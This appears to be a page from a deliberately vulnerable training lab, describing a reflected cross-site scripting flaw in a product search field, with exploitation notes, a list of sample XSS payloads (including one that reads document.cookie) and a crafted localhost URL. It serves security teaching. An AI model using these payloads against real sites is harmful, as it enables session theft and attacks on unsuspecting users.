โ† Back to Dashboard

Product Search

Raw URL:

/vulnerabilities/xss-reflected/

๐ŸŽฏ Vulnerability Info

Type: Reflected Cross-Site Scripting (XSS)

Severity: High

๐Ÿ’ก How to Exploit

  • User input is reflected in the page without encoding
  • JavaScript can be injected via the search parameter
  • Malicious URLs can be sent to victims

๐Ÿงช Sample Payloads

<script>alert('XSS')</script> <script>alert(document.cookie)</script> <img src=x onerror="alert('XSS')"> <svg onload="alert('XSS')"> <body onload="alert('XSS')"> <iframe src="javascript:alert('XSS')"> "><script>alert('XSS')</script> '><script>alert('XSS')</script>

๐Ÿ”— Crafted URL Example

http://localhost/vulnlab/vulnerabilities/xss-reflected/?search=<script>alert('XSS')</script>